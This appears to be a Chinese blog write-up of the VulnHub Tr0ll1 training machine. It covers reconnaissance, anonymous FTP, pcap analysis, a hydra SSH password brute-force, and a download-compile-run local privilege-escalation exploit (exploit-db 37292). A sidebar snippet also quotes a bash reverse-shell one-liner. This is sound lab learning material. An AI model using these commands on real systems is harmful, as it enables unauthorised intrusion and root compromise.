全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(一)Tr0ll

已于 2022-11-26 15:55:22 修改
阅读量2.4k 收藏 9
点赞数 1
分类专栏: 渗透测试vulnhub靶机实操 文章标签: web安全 linux 网络安全 系统安全 网络攻击模型
于 2022-11-20 21:37:03 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/hyjcking/article/details/127954663
版权

开启今天的虚拟机,接下来就是三板斧,先找到目标靶机的IP,然后再用nmap扫描端口,和dirb扫描目录,这两个操作可以同时进行减小时间


通过全端口扫描我们发现目标靶机开放了21,22还有80端口,并且还找到了暴露的robots.txt目录和/secret目录,还有ftb的匿名登录名:Anonymous
根据已有的信息开始攻击,我们直接登录ftb看看能找到什么线索


dir查看当前目录发现有一个叫lol.pcap的文件分析包,将文件下载到本地使用Wireshark打开查看(Wireshark的使用为必要知识,如果不知道的快去百度学一下,虽然我也不太会吧hhh)


然后我在ftb-data协议类型中找到线索——Well, well, well, aren’t you just a clever little devil, you almost found the sup3rs3cr3tdirlol Sucks, you were so close… gotta TRY HARDER!
中文意思:好吧,好吧,你不就是一个聪明的小恶魔吗,你差点发现sup3rs3cr3tdirlol 糟透了,你离得那么近......必须更加努力!
我还以为是让我使用root/sup3rs3cr3tdirlol登陆,试了好几次都失败了,被坑了,换方向,从web端试试


hh,tmd,感觉被耍了,robots.txt目录和secert目录什么有用的信息都没有,这里卡了半天,然后突然想起来上面找到的sup3rs3cr3tdirlol有可能不是密码而是目录,试一下发现果然如此

点击roflmao发现可以下载,拖到kali里面查看文件类型,发现它是一个32位ELF可执行文件


使用strings字符串对其执行一些静态分析,发现Find address 0x0856BF to proceed,意思我们找到了地址0x0856BF


访问之后终于发现了有用的线索,发现有两个文件夹:
good_luck(进入查看包含文件which_one_lol.txt)
this_folder_contains_password(进入查看包含文件pass.txt)


只有一个密码pass.txt,但是有很多个账号,我们把which_one_lol.txt下载到kali用hydra爆破一下
命令: hydra -L which_one_lol.txt -p Pass.txt 192.168.0.145 ssh
注意大小写


登录ssh之后发现靶机正在运行Ubuntu 14.04和3.13内核,看看是否可以找到这些版本的任何特权升级漏洞

二 :提权
https://www.exploit-db.com 上面找到Ubuntu 14.04和3.13内核的可利用提权shell,发现id为37293


在exploit官网查看发现可以使用37292进行提权,先搜索这个漏洞
命令:searchsploit 37293
然后再把37292.c文件保存到桌面的一个空文件夹中
命令:cp /usr/share/exploitdb/exploits/linux/local/37292.c /root/桌面/ssss/


接下来我们就可以使用python搭建一个简易服务器,操纵靶机下载这个文件并执行,我们就可以成功提权了
命令和之前说过的一样,用py3的方法搭建即可
*这里和大家说一个坑,其实这个点我卡了整整一天了,因为我一直以为这个http.server没有开启,因为我每次访问都拒绝连接,而且命令行的省略号让我误以为它一直没有开启,在网上查了很多文章都没有发现原因,然后我先切换到python再输入指令,居然直接无法识别命令了,最后我灵光一闪,是不是因为我是在本机打开这个网页的缘故?然后我到kali自带的游览器打开这个网址127.0.0.1:8979才终于解决这个问题。我想说的主要是大家遇到问题了千万不要放弃,一定要多思考多查资料,找人问是比较低效的方式,因为大部分人不会真正去帮你解决问题,最后只有靠自己,Try harder!!!与君共勉!!


接下来我们需要操纵靶机下载这个文件并执行
首先进入tmp靶机的tmp文件夹,其余的文件夹没有写入权限,然后下载37292.c文件到tmp文件夹
命令:wget http://192.168.0.128:8979/37292.c
需要注意的一点是执行这个命令的时候需要保证网页是开着的,不然它会访问不到从而连接失败


成功下载下来之后就是最后一步啦,解压并执行文件
命令:gcc 37292.c -o duya
./duya


good job,you did it!!!
说实话这个靶机不算难,但是却能比较好的巩固自己的基础知识,期间也遇到了自己不太懂的知识,会做和做的快是有区别的,在渗透这条路上还是任重而道远呐,继续加油。我是渡鸦,每两天更新一台vulnhub靶机,欢迎老爷们关注我一起 提升技术,留言进入vulnhub渗透测试交流群一起进步

若有收获,就点个赞吧

VulnHub-Tr0ll1靶机实战
千寻的博客
01-12 720
靶机下载地址 https://www.vulnhub.com/entry/tr0ll-1,100/ 环境: Vmware 15.5 靶机地址:192.168.246.128 kali地址:192.168.246.131 第部分 信息收集 第步 进行端口扫描,去发现存活主机,发现主机开放21、22、80端口 namp -sP 192.168.246.0/24 nmap -sS -sV -TS -A -P- 192.168.246.131 第二步 访问80端口 第三步 只能
Vulnhub Tr0ll2靶机实战
kiritio1024513的博客
01-16 968
次有用的靶机实战
靶机实战-DC-6
滕财然的博客
03-03 920
DC-6靶机实战 文章目录DC-6靶机实战1、主机发现2、端口及端口详细信息扫描3、老规矩,访问web服务(80端口)4、提权 1、主机发现 2、端口及端口详细信息扫描 开放22、80端口 3、老规矩,访问web服务(80端口) 输入IP之后会变成http://wordy且找不到此网站 和以前样,添加到hosts文件中//物理机和kali都添加 重新访问://这里我用的是火狐的款插件...
VulnHub-DarkHole_2靶机实战(详细保姆级教程)
精品博客,你值得一看~
08-13 6085
记得我们查看过9999端口运行的程序,当我们看到源代码的内容时,我们看到这允许远程命令执行。bash -c ‘bash -i >& /dev/tcp/192.168.184.156/9001 0>&1’ #记得修改你的IP。id=1' and 1=2 --+ #页面信息消失,说明id的闭合为单引号。到此,我们就可以进行ssh连接了.下面是拓展工具注入的方式.着急看结果的宝宝们可以直接移步下面的ssh连接步骤.
靶机Lampiao入侵实战
最新发布
没有网络安全就没有国家安全
03-08 904
靶机Lampiao入侵实战
全网详细渗透测试靶机步骤——vulnhub靶机实战(二)raven1
hyjcking的博客
11-22 1450
接下来使用kali的dirb爆破目录,发现了wordpress目录,说明网站使用了wordpress建站,所以我们会可以使用wordpress的克星wpscan来扫描。扫描到两个用户名,steven和michael,接下来我们使用hydra对michael用户的ssh密码进行爆破,这里我们使用rockyou.txt字典。尝试了下sudo提权,发现需要密码,切换目录并查看,命令:cd /var/www/html/wordpress。嘿嘿 提权成功,然后找到flag2.txt,成功拿下这台靶机
靶机实战(billu)
weixin_45605313的博客
06-01 690
billu验环境验过程信息收集主机发现端口扫描目录扫描漏洞发现漏洞利用提权总结 验环境 靶机:billu 测试机:kali,win10 验过程 信息收集 主机发现 靶机ip:192.168.238.157 端口扫描 端口:80 常见web漏洞 22 弱口令爆破 目录扫描 主页面:提示是有sql注入的 mysql后台登陆页面 漏洞发现 test 页面发现任意文件下载 找到phpmyadmin的配置文件var/www/phpmy/config.inc.php尝试(ssh,数据库
靶机实战-FristiLeaks
滕财然的博客
01-20 492
FristiLeaks靶机实战 文章目录FristiLeaks靶机实战1、主机发现2、端口扫描3、扫描端口详细信息4、访问http服务(80端口)5、获取反弹shell6、提权 1、主机发现 netdiscover -i eth0 -r 192.168.232.0/24 双网卡,147或148都可以用 2、端口扫描 masscan --rate=100000 -p 0-65535 192.168...
次零基础靶机渗透细节全程记录——Tr0ll
ran的博客
07-12 4240
渗透测试渗透测试是通过模拟恶意黑客的攻击方法,来评估计算机网络系统安全种评估方法渗透测。1.确定目标:在本靶场中,确定目标就是使用nmap进行ip扫描,确定ip即为目标,只是针对此靶场而言。其他实战中确定目标的方式包括nmap进行扫描,但不局限于这个nmap。2.信息收集:比如平常挖洞使用fofa,天眼查,ip域名等进行查,在我们这个靶场中比如信息收集包括查看源码,使用工具dirb等。3.发现漏洞:那些理论比如sql注入,文件上传等,或者找
VulnHub-Tr0ll1靶机学习笔记与文档整理
Tr0ll1是VulnHub上的靶机,它的设计目的是让使用者通过渗透测试来发现和利用漏洞,终获取系统权限。 靶机学习笔记通常包括了攻击者在进行渗透测试时的思路和步骤记录,可以帮助新手理解渗透测试的流程,并...
VulnHub-Tr0ll1.zip
01-12
VulnHub-Tr0ll1靶机学习笔记,部分是学习笔记过程,另部分是学习过程整理的lol.pacp\.c文档、user.txt等文档,供大家参考学习
web渗透测试靶机(新手)
05-07
web渗透测试靶机(新手)
CTF6靶机实战.zip
05-25
CTF6靶机实战包括三部分: 1)靶机实战过程 2)文件上传的反弹shell文件(shell.php) 3)系统版本漏洞需要的文件(8478.sh)
靶机实战:Funbox10
CHAsichuan的博客
06-14 2332
次中等难度的靶机详细版记录
靶机实战-zico
滕财然的博客
01-19 1281
zico靶机实战 1、主机发现 netdiscover: -i 指定网卡 -r 指定网段 2、端口扫描 目标开放了44929,22,111,80端口 3、扫描端口详细信息 22-ssh,80-http,111-rpcbind,44929-status 老规矩,干80端口 4、渗透80端口(http服务) 点击页面上可点击的按钮,找到个有用的: 链接后面有?page= tools.htm...
靶机实战-Acid
滕财然的博客
01-26 932
Acid靶机实战 文章目录Acid靶机实战1、主机发现2、端口扫描3、端口详细信息扫描4、访问8080端口5、访问33447端口6、提权 1、主机发现 目标主机:192.168.232.160 我是用arp命令扫的,大家可自行选择 2、端口扫描 3、端口详细信息扫描 4、访问8080端口 只有个文件,点击就会下载,先pass 5、访问33447端口 查看网页源代码: 发现串16进制...
靶机实战-evilscience
滕财然的博客
01-28 788
evilscience靶机实战 文章目录evilscience靶机实战1、主机发现2、端口扫描3、端口详情扫描4、访问80端口5、提权方法方法二 1、主机发现 目标IP:192.168.232.164 2、端口扫描 3、端口详情扫描 22端口–ssh、80端口–http 4、访问80端口 浏览网站,寻找有价值的信息 发现该网站有可能存在LFI(本地文件包含) 在about.php页面看...
Vulnhub靶机
weixin_43902100的博客
09-21 746
Vulnhub靶机渗透测试实战):CHERRY: 1 下载地址:http://www.vulnhub.com/entry/cherry-1,552/ 验环境:VMware,kali虚拟机 将下载好的镜像文件导入VMware 局域网内扫描主机 arp-scan -l 般情况小的不会是靶机的IP,所以靶机的IP为:192.168.46.130 nmap扫描主机,查看开启了那些端口 nmap -sV -p- 192.168.46.130 发现开放了80,7755两个端口,进行访问,发现两个
靶机实战-blogger
ST0new的博客
04-05 4092
Web 开发人员 James M Brunner 近创建了个博客网站。他雇佣你来测试他博客网站的安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值